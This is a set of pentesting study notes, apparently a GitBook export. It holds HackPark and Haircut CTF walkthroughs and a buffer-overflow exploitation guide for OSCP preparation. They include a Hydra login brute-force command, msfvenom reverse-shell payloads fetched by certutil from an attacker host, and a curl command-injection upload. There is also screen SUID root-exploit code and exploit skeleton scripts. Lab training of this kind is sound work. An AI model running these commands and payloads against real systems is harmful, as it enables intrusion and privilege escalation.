My first attempt at scanning suggested the machine wasn't alive on the network, but adding -Pn to disable host discovery resolved the issue. 10 | 11 | From the scan we see two open TCP ports; an IIS server on port 80 and what appears to be RDP operating on port 3389. We also see from one of the default scripts executed from using the '-sC' flag that there is a webpage titled 'hackpark' on the web server. 12 | 13 | Opening the web page we're greeted by a familiar image, Pennywise. Further enumeration of the page provides two additional clues that might help us gain access to the page. 14 | 15 | The page also includes an Archive, which may provide usernames. Further examination reveals that there is only one user, but it still might pay off. We identify two versions of the username that we'll save for later: 'Adminstrator' and 'Admin'. 16 | 17 | ### **Establishing a foothold** 18 | 19 | Next, we turn our attention to the login page. Reviewing the page source (network tab) reveals that the page is using POST messages to complete login. Since we already have two possible usernames we may be able to brute force the post form with Hydra. 20 | 21 | Setting up Hydra is fairly straight forward but requires additional information in order to brute force HTTP forms. The command should be formatted like the following: 22 | 23 | ``` 24 | Hydra -l -P http-post-form “:: 25 | ``` 26 | 27 | First, we create a list of the usernames discovered during enumeration. This is accomplished by creating a .txt file using your editor of choice. Be sure to include variations of the names you found. 28 | 29 | Next, we return to FireFox to gather the additional required information. We use FireFox's built in inspector tool to gather the information. 30 | 31 | 1. Right click on the password field and select "inspect element." 32 | 2. Select the "network" tab then attempt a login to generate a post request. 33 | 3. Select the post request, then click the "resend" dropdown and select "edit and resend" to view the request. 34 | 4. Capture the information contained in the "URL" and "Request Body Fields." 35 | 5. Add the information to the payload and be sure to replace the user and password fields with ^USER^ and ^PASS^. The final payload should look like the following: 36 | 37 | ```bash 38 | hydra -L Documents/usernames.txt -P /usr/share/wordlists/rockyou.txt 10.10.123.151 http-form-post "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=TOBW8QB2Q1bJrd7T7HsS3fWFCIZpV%2BSQtzBYlIkaU4ByFOGGPbsPj4DSWfzE76ESPJ%2FAixlw2qczi60QSYlOlWbeDdJH%2FPD%2Bk28%2FSXg39HjUlbJh5osYPtt3g%2B28B26yy20WoJhmTf2C%2B7SJ4obtCMSaedImhrhNSKEr1d1rG1P%2BMc%2FV&__EVENTVALIDATION=qArfCXjRgc%2FupGmTQg94iY45Zhm%2FDcY6J2yn04JGA7L7UV1KeIx2EZV3EyAJ6GJ2cRKddbCCFFdcKOVHxxqpRr%2FBzvfkGKtcTSrby02Ac%2FnFBimu3PdUoge83U%2BLHPH%2BRuMIPDkCO2ASIW7SouDvT4NmgE6A%2Fe1I4fhXybvPHiWF3i1N&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" 39 | ``` 40 | 41 | We execute the command and within a few moments Hydra provides two sets of credentials. 42 | 43 | We are able to successfully log in to BlogEngine using the credentials and begin enumeration. Under ‘About’ we find that this particular blog utilizes BlogEngine version 3.3.6.0. A quick google search reveals an [exploit](https://www.exploit-db.com/exploits/46353) for this version. 44 | 45 | This exploit is fairly straightforward and simple to execute. 46 | 47 | 1. Download the exploit to the attacking machine. 48 | 2. Update the IP address to that of the attacking machine, and change the port (if desired). 49 | 3. Start a Netcat listener on the attacking machine to catch the incoming connection. 50 | 4. Return to BlogEngine and open the pre-existing post 51 | 5. Select the File icon and upload the exploit. Be sure to rename the file as ‘PostView.ascx’ prior to upload. 52 | 6. Navigate to **http://10.10.49.8/?theme=../../App\_Data/files** (update IP accordingly). If you’ve done everything correctly the page will hang and you’ll receive a reverse shell. 53 | 54 | ### Privilege Escalation (no Metasploit) 55 | 56 | Before we begin enumerating for privilege escalation we need to upgrade to a fully interactive shell. The `systeminfo` command reveals that the target is running Windows Server 2012 R2 Standard, 64-bit. To upgrade the shell, we first generate a paylaod with MSFVenom with the following next. 57 | 58 | ``` 59 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe 60 | ``` 61 | 62 | Next, upload the payload to the target. On Windows I prefer setting up a SimpleHTTPServer on the attacking machine and downloading the desired file(s) using certutil on the target. 63 | 64 | ``` 65 | certutil -urlcache -f http://attackerip/shell.exe shell.exe 66 | ``` 67 | 68 | After uploading the payload to the target, start another Netcat listener on the attacking machine. Run the payload on the target and you'll receive a fully interactive shell. 69 | 70 | Now we can focus our attention to escalating our privileges. We start by uploading [WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS), again with the assistance of the SimpleHTTPServer and certutil. 71 | 72 | Running WinPEAS provides comprehensive results including several possible privilege escalation options. One that seems particularly interesting is a service called SystemScheduler. **(Note: I made several unsuccessful attempts to exploit the available autologon credentials before moving on to this service)** 73 | 74 | Further examination of the SystemScheduler service suggests that it contains a privilege escalation [exploit](https://www.exploit-db.com/exploits/45072). Initial review of this exploit suggests it should work on this system; however, after several attempts it does not. 75 | 76 | In fact, getting this exploit to work requires more enumeration. We know from WinPEAS that the service is present, and the service control command confirms that the service is running; however, the suggested service (wservice.exe) does not seem to be running on a schedule. 77 | 78 | After a good bit of searching, I located the program's log files in C:\Program Files (x86)\SystemScheduler\Events. In the events directory is a file named '20198415519.INI\_LOG.txt'. Viewing this file reveals that a different executable (Message.exe) is running at :00 and :33 of every minute! 79 | 80 | Now that we've identified the correct executable, exploitation is simple. 81 | 82 | 1. On the target machine, rename Message.exe to Message.bak 83 | 2. Create a new payload with MSFVenom and name it Message.exe. 84 | 3. Start a Netcat listener on the attacking machine 85 | 4. Upload the payload and wait for the program to run 86 | 5. Root! 87 | 88 | ``` 89 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.6.24.176 LPORT=4450 -f exe > shell.exe 90 | ``` 91 | 92 | The flags are located on jeff & Administrator desktops. 93 | -------------------------------------------------------------------------------- /7.-walkthroughs/htb-haircut.md: -------------------------------------------------------------------------------- 1 | # HTB - Haircut 2 | 3 | ![](<../.gitbook/assets/image (3).png>) 4 | 5 | In this walkthrough we'll examine 'Haircut' from Hack The Box. This machine provides a number of useful lessons and I highly recommend working through this machine in preparation for the OSCP examination. 6 | 7 | ### **Scanning** and enumeration 8 | 9 | As usual, begin by scanning the machine to identify open ports. My ‘go to’ scan is `nmap -p- -A $ipaddress`. The scan reveals that two ports are open: SSH on port 22 and an nginx webserver operating on port 80. 10 | 11 | Enumerating this box is fairly straight forward with only two open ports. 12 | 13 | First, we briefly look at SSH. The SSH server does not permit anonymous logins and the version does not have any major vulnerabilities that may help us gain access. 14 | 15 | Next, we turn our attention to the web server on port 80. Visiting the website in our browser takes us to a page containing an image. The source of the page does not provide any interesting information. 16 | 17 | Scanning with Nikto reveals that the Nginx server is outdated; however, a quick Google search does not yield any vulnerabilities for the installed version. Interestingly, Nikto also indicates the existence of a ‘/test.html’ directory, which contains another seemingly dead end (for now). 18 | 19 | Next, we turn our attention to fuzzing for additional directories on the web server. Our initial Dirsearch scan locates the ‘/test.html’ directory and a redirect for an /uploads directory. Navigating to /uploads/ we receive a 403 error. 20 | 21 | {% hint style="info" %} 22 | This is where this machine provides a valuable lesson for new and developing pentesters. Our enumeration to this point hasn’t provided any other clues, so we really only have two options: go back to see if we’ve missed anything, or use more intensive directory scans. 23 | {% endhint %} 24 | 25 | After a quick review of the Nmap scan, I opt to continue more extensive fuzzing for hidden directories. I altered the original scan parameters to use the 'directory-list-2.3-medium.txt' wordlist, but receive even fewer results. (This wordlist is included with Kali and can be found at /usr/share/wordlists/dirbuster/) . 26 | 27 | Finally, I modified the scan again, this time using the -f option, which forces the specified extensions be appended to every entry in the word list. I was previously unfamiliar with this option; however, in this instance it paid off. and the scan identifies the presence of "/exposed.php". 28 | 29 | Navigating to the page we find a web form that allows user input. Selecting 'Go' without modifying the input field results in the display of the image we previously located at test.html. This suggests command execution is occurring. Time to examine this function using a web proxy interceptor. 30 | 31 | After loading and configuring Burp Suite we execute and intercept the command. Analysis of the results reveals that the command is generating a POST message that is sent to the webserver to retrieve 'test.html.' 32 | 33 | We can now use Burp Suite's repeater to modify the POST request and attempt to change the behavior of the web server. I first attempted to pass the 'id' command before the URL, but 'test.html' still loads. Next, I attempt with '\&id', and receive an error from the server. In the response message we see that curl is being used to transmit the request to the web server. 34 | 35 | Following the suggestion of the text in the error message, I modify the formurl field in Repeater, replacing '\&id' with '--help.' The response from the server includes the curl help menu (command execution). 36 | 37 | ### Establishing a foothold 38 | 39 | Now that we understand how the command works, we can attempt to upload files to the server using curl. Our previous enumeration identified the existence of an ‘/uploads’ directory, which we can target as our upload destination. Nmap also identified that this is a Linux box, so we’ll first attempt to upload an image to the server—then test to determine if the upload was successful. 40 | 41 | To upload files we first create a SimpleHTTPServer on the attacking machine, then use Burp Suite to attempt to retrieve the file by modifying the POST command. We can also specify within the POST command to attempt to save the file in the location where we suspect the 'uploads' directory resides: ' /var/www/html/uploads/.' 42 | 43 | ``` 44 | Formurl = http://10.10.14.18/cat.jpg -o /var/www/uploads/cat.jpg 45 | ``` 46 | 47 | The web server response does not include an error, but we can confirm the upload was successful by navigating to 'uploads/cat.jpg.' 48 | 49 | Next, we can upload attempt to upload a reverse shell. Since we know that the server is already using PHP, we’ll first attempt a PHP reverse shell. I modify a basic PHP reverse shell with the IP address of my attacking machine and upload it using Burp Suite. I then set up a netcat listener and navigate to the newly uploaded shell via the browser. Success! 50 | 51 | The user flag is located at /home/maria/Desktop 52 | 53 | ### Privilege escalation 54 | 55 | Before escalating our privileges we need to upgrade to an interactive shell. Enumeration reveals that this machine includes Python3, but not Python2. Therefore we spawn a TTY shell using: 56 | 57 | ``` 58 | Python3 “import pty; pty.spawn(‘/bin/bash’)” 59 | ``` 60 | 61 | We then background using `Ctrl + Z`, enter the command `stty raw -echo`, and foreground our shell using `fg`. We now have an interactive TTY shell with tab autocompletion. 62 | 63 | Next we move on to some basic enumeration to identify privilege escalation possibilities. My methodology typically includes reviewing user and system information, checking for installed binaries, and checking SUID files. If nothing stands out I move on to uploading scripts such as LinPeas.sh to assist with further enumeration. On this machine; however, the basic enumeration was sufficient and we identify an interesting binary with the SUID bit set.![](https://oncyberwar.com/wp-content/uploads/2021/01/image-15.png) 64 | 65 | A Google search reveals an exploit is available for this version. [https://www.exploit-db.com/exploits/41154](https://www.exploit-db.com/exploits/41154) 66 | 67 | This exploit includes a bash script, so we can easily download the file, to our attacking machine, make any necessary modification(s), and upload to our target. However, our first attempt at running the exploit fails to compile the embedded C binaries because of missing dependencies. The easiest method for resolving this issue is to remove the code for the creation of the two binaries, and instead creating/compiling them on your attacking machine and transferring them to the target. 68 | 69 | From the original script the code below and save it to our attacking machine as libhax.c. 70 | 71 | ``` 72 | #include 73 | #include 74 | #include 75 | __attribute__ ((__constructor__)) 76 | void dropshell(void){ 77 | chown("/tmp/rootshell", 0, 0); 78 | chmod("/tmp/rootshell", 04755); 79 | unlink("/etc/ld.so.preload"); 80 | printf("[+] done!\n"); 81 | } 82 | ``` 83 | 84 | Compile the binary using the suggested command. 85 | 86 | ``` 87 | gcc -fPIC -shared -ldl -o libhax.so libhax.c 88 | ``` 89 | 90 | For the second script we extract the code below, saving it on our attacking machine as rootshell.c. 91 | 92 | ``` 93 | #include 94 | int main(void){ 95 | setuid(0); 96 | setgid(0); 97 | seteuid(0); 98 | setegid(0); 99 | execvp("/bin/sh", NULL, NULL); 100 | } 101 | ``` 102 | 103 | Finally, we compile the second script using the included command. 104 | 105 | ``` 106 | gcc -o rootshell rootshell.c 107 | ``` 108 | 109 | Next, we transfer both binaries to the /tmp directory on the target machine using wget.![](https://oncyberwar.com/wp-content/uploads/2021/01/image-16.png) 110 | 111 | Finally, we execute the remaining commands from the exploit script (one at a time). 112 | 113 | ``` 114 | cd /etc 115 | umask 000 116 | screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" 117 | screen -ls 118 | /tmp/rootshell 119 | ``` 120 | 121 | Success!![](https://oncyberwar.com/wp-content/uploads/2021/01/image-17.png) 122 | 123 | The root flag is located in the /root directory. 124 | -------------------------------------------------------------------------------- /4.-exploitation/buffer-overflows.md: -------------------------------------------------------------------------------- 1 | # Buffer overflows 2 | 3 | These instructions are a combination of my notes from the PWK course material and notes taken while executing Tib3rius's ["Buffer Overflow Prep"](https://tryhackme.com/room/bufferoverflowprep) room on THM. There are multiple techniques for executing buffer overflows, but all follow the same basic outline. Find what works for you. 4 | 5 | ## General information 6 | 7 | Almost all buffer overflow exploits follow a common general flow. 8 | 9 | * Create a large buffer to trigger the memory overflow 10 | * Control EIP by overwriting a return address on the stack by padding a large buffer with an appropriate offset 11 | * Include a chosen payload in the buffer prepended by a NOP sled 12 | * Choose a correct return address instruction such as JMP ESP in order to redirect the execution flow into the chosen payload 13 | 14 | #### Important memory locations 15 | 16 | * EAX, EBX, EDX, ESI and EDI are often used as general purpose registers for temporary data storage 17 | * EAX (accumulator) - arithmetic and logical functions 18 | * EBX (base) - base pointer for memory addresses 19 | * ECX (counter) - loop, shift, and rotation counter 20 | * EDX (data) - I/O port addressing, multiplication and division 21 | * ESI (source index) - pointer addressing of data and source in string copy operations 22 | * EDI (destination index) - pointer addressing of data and destination in string copy operations 23 | * ESP is the stack pointer and keeps track of the most recently referenced location by storing a pointer 24 | * EBP is the base pointer and stores a pointer on top of the stack when a function is called 25 | * EIP is the instruction pointer and always points to the next code instruction to be executed 26 | 27 | {% hint style="info" %} 28 | EIP is the primary target during a buffer overflow because it control program flow! 29 | {% endhint %} 30 | 31 | ## Setup 32 | 33 | ### Immunity Debugger: 34 | 35 | 1. Start the application first, then open Immunity Debugger and use File --> Attach to view the applicable process -OR- 36 | 2. Open Immunity Debugger and use File-> Open to start the application 37 | 3. Select the "red arrow" to run the application 38 | 39 | #### Basic commands 40 | 41 | * F2 - set breakpoint 42 | * F7 - Step into a function 43 | * F8 - Step over a function 44 | * F9 - Run 45 | 46 | ### Mona.py 47 | 48 | 1. Set up your working folder with the following command: 49 | 50 | ``` 51 | !mona config -set workingfolder c:\mona\%p 52 | ``` 53 | 54 | Mona is available at: [https://github.com/corelan/mona](https://github.com/corelan/mona) 55 | 56 | ## Fuzzing 57 | 58 | The following script will fuzz a program by sending a string of characters that increases by 100 bytes with each iteration. To use, update the IP address, port, and string (line 20) to match the program you are testing. 59 | 60 | ``` 61 | import socket, time, sys 62 | 63 | ip = "10.0.0.1" #change 64 | port = 21 #change 65 | timeout = 5 66 | 67 | # Create an array of increasing length buffer strings. 68 | buffer = [] 69 | counter = 100 70 | while len(buffer) < 30: 71 | buffer.append("A" * counter) 72 | counter += 100 73 | 74 | for string in buffer: 75 | try: 76 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 77 | s.settimeout(timeout) 78 | connect = s.connect((ip, port)) 79 | s.recv(1024) 80 | s.send("USER username\r\n") #update 81 | s.recv(1024) 82 | 83 | print("Fuzzing PASS with %s bytes" % len(string)) 84 | s.send("PASS " + string + "\r\n") 85 | s.recv(1024) 86 | s.send("QUIT\r\n") 87 | s.recv(1024) 88 | s.close() 89 | except: 90 | print("Could not connect to " + ip + ":" + str(port)) 91 | sys.exit(0) 92 | time.sleep(1) 93 | ``` 94 | 95 | ## Replicate the crash 96 | 97 | Build a script to replicate the error caused by the fuzzing script. 98 | 99 | ``` 100 | import socket 101 | 102 | ip = "10.0.0.1" #update 103 | port = 21 #update 104 | 105 | prefix = "" 106 | offset = 0 107 | overflow = "A" * offset 108 | retn = "" 109 | padding = "" 110 | payload = "" 111 | postfix = "" 112 | 113 | buffer = prefix + overflow + retn + padding + payload + postfix 114 | 115 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 116 | 117 | try: 118 | s.connect((ip, port)) 119 | print("Sending evil buffer...") 120 | s.send(buffer + "\r\n") 121 | print("Done!") 122 | except: 123 | print("Could not connect.") 124 | ``` 125 | 126 | ### Locate EIP 127 | 128 | Generate a string of characters 400 bytes longer than the length that caused the program to crash while fuzzing. 129 | 130 | ``` 131 | msf-pattern_create -l 2700 132 | ``` 133 | 134 | * Insert the generated pattern into the "payload" variable of your script 135 | * Restart Immunity Debugger and the program you are testing 136 | * Run the exploit script 137 | * Note the characters that overwrite EIP 138 | * Use pattern\_offset.rb to locate the position of the characters in the string 139 | 140 | ``` 141 | msf-pattern_offset -q 39694438 142 | ``` 143 | 144 | * Add the value from pattern offset to the "offset" variable in the script 145 | * Set the script's "retn" variable to "BBBB" 146 | * Restart Immunity Debugger and the program you are testing 147 | * Run the exploit script 148 | * EIP should be cleanly overwritten with Bs (42424242) 149 | 150 | ### Check for bad characters 151 | 152 | 1. Insert the bad character buffer into the scripts "payload" variable 153 | 2. Restart Immunity Debugger and the program you are testing 154 | 3. Run the exploit script 155 | 4. After the program crashes, right click on "ESP" and "Follow Dump" 156 | 5. Remove characters that cause errors in memory (non-sequential) 157 | 6. Repeat steps 2-5 until there are no errors remaining in ESP 158 | 159 | {% hint style="info" %} 160 | \x00 was already removed from this buffer. 161 | {% endhint %} 162 | 163 | ``` 164 | # Bad Characters 165 | 166 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 167 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 168 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 169 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 170 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 171 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 172 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 173 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 174 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 175 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 176 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 177 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 178 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 179 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 180 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 181 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 182 | ``` 183 | 184 | ## Redirect execution 185 | 186 | Next, we want to find a reliable location in memory that contains an JMP ESP (or similar) instruction. This will enable us to redirect the program to our payload at the time of the crash. 187 | 188 | 1. Use the mona jmp command to search for jmp (or equivalent). By default, jmp ignores modules with DEP or ASLR. 189 | 2. Select from the list of options and note the memory location 190 | 3. Reverse the location (little endian) and insert the value in the script's "retn" variable (625011af become /xaf/x11/x50/x62) 191 | 192 | ``` 193 | !mona jmp -r esp -cpb "\x00\x0a\x0d" # update bad characters 194 | 195 | # mona find can also be used here, but jmp normall works 196 | !mona find -s 'jmp esp' -type instr -cm aslr=false,rebase=false,nx=false -cpb "\x00\x0a\x0d" 197 | ``` 198 | 199 | ## Generate payload 200 | 201 | Next, we generate our reverse shell payload and add it to the exploit. We'll also pad the beginning our the payload with a minimum of 16 NOPs (x90) to provide space in memory for decoding the payload. 202 | 203 | ### Generate shellcode with Metasploit 204 | 205 | ``` 206 | msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f py 207 | ``` 208 | 209 | ### Pad with NOPs 210 | 211 | Add the following to the script's "padding" variable. 212 | 213 | ``` 214 | "\x90" * 16 215 | ``` 216 | 217 | ## Launch exploit 218 | 219 | * Setup a netcat listener on the attacking machine using the same port identified during the generation of the payload 220 | * Launch the exploit 221 | --------------------------------------------------------------------------------